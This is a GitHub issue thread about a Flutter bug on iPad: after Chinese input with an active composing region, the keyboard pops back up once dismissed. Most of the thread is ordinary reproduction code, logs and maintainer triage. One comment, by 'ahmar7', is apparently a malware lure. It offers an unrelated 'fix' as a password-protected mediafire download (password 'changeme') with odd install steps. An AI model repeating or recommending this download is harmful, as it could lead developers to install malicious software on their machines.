### ISSUE TITLE
[iPad] Clicking the dismiss button does not dismiss the keyboard when the composing region is active

### ISSUE THREAD

**Issue by demoYang** [flutter/flutter#154156]
### Steps to reproduce

1. use chinese input ;
2. input with composing;
3. click dismiss button on keyboard;

Textfiled lost focus 

### Expected results

 keyboard is dismissed

### Actual results

keyboard is dismissed but pops up a few seconds later

### Code sample

<details open><summary>Code sample</summary>

```dart
import 'package:flutter/material.dart';

void main() {
  runApp(const MainApp());
}

class MainApp extends StatelessWidget {
  const MainApp({super.key});

  @override
  Widget build(BuildContext context) {
    return MaterialApp(
      home: Scaffold(
        body: Center(
          child: buildText(),
        ),
      ),
    );
  }

  Widget buildText() {
    return TextField(onTapOutside: (event) {
      FocusManager.instance.primaryFocus?.unfocus();
    });
  }
}

```

</details>

### Screenshots or Video

<details open>
<summary>Screenshots / Video demonstration</summary>

https://github.com/user-attachments/assets/b9ce6972-4547-4031-8cfd-4063ccca8635

</details>

### Logs

<details open><summary>Logs</summary>

```
......
Make a symbolic breakpoint at UIViewAlertForUnsatisfiableConstraints to catch this in the debugger.
The methods in the UIConstraintBasedLayoutDebugging category on UIView listed in <UIKitCore/UIView.h> may also be helpful.
[LayoutConstraints] Unable to simultaneously satisfy constraints.
        Probably at least one of the constraints in the following list is one you don't want. 
        Try this: 
                (1) look at each constraint and try to figure out which you don't expect; 
                (2) find the code that added the unwanted constraint or constraints and fix it. 
        (Note: If you're seeing NSAutoresizingMaskLayoutConstraints that you don't understand, refer to the documentation for the UIView property translatesAutoresizingMaskIntoConstraints) 
(
    "<NSAutoresizingMaskLayoutConstraint:0x283c04dc0 h=--& v=--& _UIButtonBarButton:0x133fafe80.height == 0   (active)>",
    "<NSLayoutConstraint:0x283c08b90 V:|-(6)-[_UIUCBKBSelectionBackground:0x135874650]   (active, names: '|':_UIButtonBarButton:0x133fafe80 )>",
    "<NSLayoutConstraint:0x283c01ae0 _UIUCBKBSelectionBackground:0x135874650.bottom == _UIButtonBarButton:0x133fafe80.bottom - 6   (active)>"
)


Will attempt to recover by breaking constraint 
<NSLayoutConstraint:0x283c01ae0 _UIUCBKBSelectionBackground:0x135874650.bottom == _UIButtonBarButton:0x133fafe80.bottom - 6   (active)>


Make a symbolic breakpoint at UIViewAlertForUnsatisfiableConstraints to catch this in the debugger.
The methods in the UIConstraintBasedLayoutDebugging category on UIView listed in <UIKitCore/UIView.h> may also be helpful.
[Assert] View <(null):0x0> does not conform to UITextInput protocol
[ERROR:flutter/shell/platform/darwin/ios/framework/Source/profiler_metrics_ios.mm(203)] Error retrieving thread information: (os/kern) invalid argument
[Snapshotting] Snapshotting a view (0x134959200, UIKeyboardImpl) that is not in a visible window requires afterScreenUpdates:YES.
```

</details>

### Flutter Doctor output

<details open><summary>Doctor output</summary>

```console
fvm flutter doctor -v         
[!] Flutter (Channel stable, 3.22.3, on macOS 14.4.1 23E224 darwin-arm64, locale zh-Hans-CN)
    • Flutter version 3.22.3 on channel stable at /Users/xuyang/fvm/versions/3.22.3
    ! Warning: `flutter` on your path resolves to /Users/xuyang/fvm/versions/3.19.5/bin/flutter, which is not inside your current Flutter SDK checkout at /Users/xuyang/fvm/versions/3.22.3. Consider adding /Users/xuyang/fvm/versions/3.22.3/bin to the front of your path.
    ! Warning: `dart` on your path resolves to /Users/xuyang/fvm/versions/3.19.5/bin/dart, which is not inside your current Flutter SDK checkout at /Users/xuyang/fvm/versions/3.22.3. Consider adding /Users/xuyang/fvm/versions/3.22.3/bin to the front of your path.
    • Upstream repository https://github.com/flutter/flutter.git
    • Framework revision b0850beeb2 (6 weeks ago), 2024-07-16 21:43:41 -0700
    • Engine revision 235db911ba
    • Dart version 3.4.4
    • DevTools version 2.34.3
    • Pub download mirror https://pub.flutter-io.cn
    • Flutter download mirror https://storage.flutter-io.cn
    • If those were intentional, you can disregard the above warnings; however it is recommended to use "git" directly to perform update checks and upgrades.

[✓] Android toolchain - develop for Android devices (Android SDK version 34.0.0-rc2)
    • Android SDK at /Users/xuyang/Library/Android/sdk
    • Platform android-34, build-tools 34.0.0-rc2
    • ANDROID_HOME = /Users/xuyang/Library/Android/sdk
    • Java binary at: /Applications/Android Studio.app/Contents/jbr/Contents/Home/bin/java
    • Java version OpenJDK Runtime Environment (build 17.0.11+0-17.0.11b1207.24-11852314)
    • All Android licenses accepted.

[✓] Xcode - develop for iOS and macOS (Xcode 15.3)
    • Xcode at /Applications/Xcode.app/Contents/Developer
    • Build 15E204a
    • CocoaPods version 1.15.2

[✓] Android Studio (version 2024.1)
    • Android Studio at /Applications/Android Studio.app/Contents
    • Flutter plugin can be installed from:
      🔨 https://plugins.jetbrains.com/plugin/9212-flutter
    • Dart plugin can be installed from:
      🔨 https://plugins.jetbrains.com/plugin/6351-dart
    • Java version OpenJDK Runtime Environment (build 17.0.11+0-17.0.11b1207.24-11852314)

[✓] VS Code (version 1.92.2)
    • VS Code at /Applications/Visual Studio Code.app/Contents
    • Flutter extension version 3.94.0

[✓] Connected device (3 available)
    • iPad (mobile)                   • b2a17aba22d11286adabc5eba7a8b9e6beec5480 • ios          • iOS 14.4 18D52
    • macOS (desktop)                 • macos                                    • darwin-arm64 • macOS 14.4.1 23E224 darwin-arm64
    • Mac Designed for iPad (desktop) • mac-designed-for-ipad                    • darwin       • macOS 14.4.1 23E224 darwin-arm64

[✓] Network resources
    • All expected network resources are available.

! Doctor found issues in 1 category.
```

</details>

**Comment by demoYang** [comment]
ipad os version : 14.4

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Junesui** [comment]
same issue. The paste option is not available at this time


```
Flutter 3.24.1 • channel stable • https://github.com/flutter/flutter.git
Framework • revision 5874a72aa4 (6 days ago) • 2024-08-20 16:46:00 -0500
Engine • revision c9b9d5780d
Tools • Dart 3.5.1 • DevTools 2.37.2
```

```
  @override
  Widget build(BuildContext context) {
    return Scaffold(
      body: SafeArea(
        child: Center(
          child: ExtendedTextField(
            controller: _controller,
            specialTextSpanBuilder: null,
            onTapOutside: (event) {
              FocusManager.instance.primaryFocus?.unfocus();
            },
          ),
        ),
      ),
    );
  }
```

**Comment by Junesui** [comment]
There is no problem with version Flutter 3.22.2

**Comment by danagbemava-nc** [comment]
Hi @demoYang, I just tested a swiftui app and the behavior is the same as flutter, i.e, the dismiss button unfocuses the keyboard. This is not specific to Chinese. This also happens with the notes app and the reminders app on the latest version of iOS. The same behavior happens with the settings and messages app. 

https://github.com/user-attachments/assets/b7d1d429-67d7-49d0-9417-8cd9baa39380

How do other iOS apps behave on your version of iOS?

**Comment by demoYang** [comment]
@danagbemava-nc in flutter should click double to dismiss keyboard, iOS apps just click once ,keyboard will dismiss

**Comment by Junesui** [comment]
@demoYang On Android, long pressing and then click the paste option, it will also lose focus, and the content cannot be pasted into the input box。
Clicking the paste option will close the keyboard

**Comment by demoYang** [comment]
@Junesui  We can ignore Android,  On iPad  flutter app the keyboard should be dismiss ,when you click dismiss button , but i click twice , i think this should be fix

**Comment by danagbemava-nc** [comment]
### Summary

When inputing Chinese text and the composing region is active, clicking on the dismiss button on the iPad keyboard should dismiss the keyboard. However, in flutter, the keyboard pops down and pops back up. 

### Observation 

When I checked the `messages` app, the text that remains after clicking the dismiss button is "combined", sort of like it's one word and the keyboard is dismissed. In flutter, the text does get combined and the keyboard is dismissed but the keyboard pops up just a second or so later with the textfield disabled. The dismiss button needs to be clicked again to dismiss the keyboard completely. This does not happen if the composing region is not active, i.e, you select one of the suggestions to form the word. See the recording below

Tested on my `iPad Air M1`, running `iOS 17.5.1`


https://github.com/user-attachments/assets/87416a89-f7f6-4263-a9ec-206e9101c822



<details>
<summary>flutter doctor -v</summary>

```
[✓] Flutter (Channel stable, 3.24.1, on macOS 14.6.1 23G93 darwin-arm64, locale en-US)
    • Flutter version 3.24.1 on channel stable at /Users/deanli/dev/stable
    • Upstream repository https://github.com/flutter/flutter.git
    • Framework revision 5874a72aa4 (8 days ago), 2024-08-20 16:46:00 -0500
    • Engine revision c9b9d5780d
    • Dart version 3.5.1
    • DevTools version 2.37.2
```

```
[!] Flutter (Channel master, 3.25.0-1.0.pre.170, on macOS 14.6.1 23G93 darwin-arm64, locale en-US)
    • Flutter version 3.25.0-1.0.pre.170 on channel master at /Users/deanli/dev/master
    ! Warning: `flutter` on your path resolves to /Users/deanli/dev/stable/bin/flutter, which is not inside your current Flutter SDK checkout at /Users/deanli/dev/master. Consider adding /Users/deanli/dev/master/bin to the front of your path.
    ! Warning: `dart` on your path resolves to /Users/deanli/dev/stable/bin/dart, which is not inside your current Flutter SDK checkout at /Users/deanli/dev/master. Consider adding /Users/deanli/dev/master/bin to the front of your path.
    • Upstream repository https://github.com/flutter/flutter.git
    • Framework revision 7e9a622420 (2 hours ago), 2024-08-29 01:08:34 -0400
    • Engine revision f48ecf5b49
    • Dart version 3.6.0 (build 3.6.0-193.0.dev)
    • DevTools version 2.39.0
    • If those were intentional, you can disregard the above warnings; however it is recommended to use "git" directly to perform update checks and upgrades.
```
</details>

**Comment by Renzo-Olivares** [comment]
cc @LongCatIsLooong, from text input triage.

**Comment by LongCatIsLooong** [comment]
This is reproducible on a simulator if you uncheck "connect hardware keyboard" from the simulator's menu: I/O -> Keyboard. The framework is sending "show" command when the keyboard is dismissed for the first time:

```
flutter: #0      _PlatformTextInputControl.show (package:flutter/src/services/text_input.dart:2318:22)
#1      TextInput._show (package:flutter/src/services/text_input.dart:1999:15)
#2      TextInputConnection.show (package:flutter/src/services/text_input.dart:1408:25)
#3      EditableTextState._openInputConnection (package:flutter/src/widgets/editable_text.dart:3648:29)
#4      EditableTextState.requestKeyboard (package:flutter/src/widgets/editable_text.dart:3756:7)
#5      EditableTextState._handleSelectionChanged (package:flutter/src/widgets/editable_text.dart:3979:11)
#6      EditableTextState._formatAndSetValue (package:flutter/src/widgets/editable_text.dart:4206:7)
#7      EditableTextState.updateEditingValue (package:flutter/src/widgets/editable_text.dart:3260:7)
#8      TextInput._updateEditingValue (package:flutter/src/services/text_input.dart:2067:43)
#9      TextInput._handleTextInputInvocation (package:flutter/src/services/text_input.dart:1903:29)
#10     TextInput._loudlyHandleTextInputInvocation (package:flutter/src/services/text_input.dart:1803:20)
#11     MethodChannel._handleAsMethodCall (package:flutter/src/services/platform_channel.dart:571:55)
#12     MethodChannel.setMethodCallHandler.<anonymous closure> (package:flutter/src/services/platform_channel.dart:564:34)
#13     _DefaultBinaryMessenger.setMessageHandler.<anonymous closure> (package:flutter/src/services/binding.dart:618:35)
#14     _invoke2 (dart:ui/hooks.dart:344:13)
#15     _ChannelCallbackRecord.invoke (dart:ui/channel_buffers.dart:45:5)
#16     _Channel.push (dart:ui/channel_buffers.dart:135:31)
#17     ChannelBuffers.push (dart:ui/channel_buffers.dart:343:17)
#18     PlatformDispatcher._dispatchPlatformMessage (dart:ui/platform_dispatcher.dart:750:22)
#19     _dispatchPlatformMessage (dart:ui/hooks.dart:257:31)
```
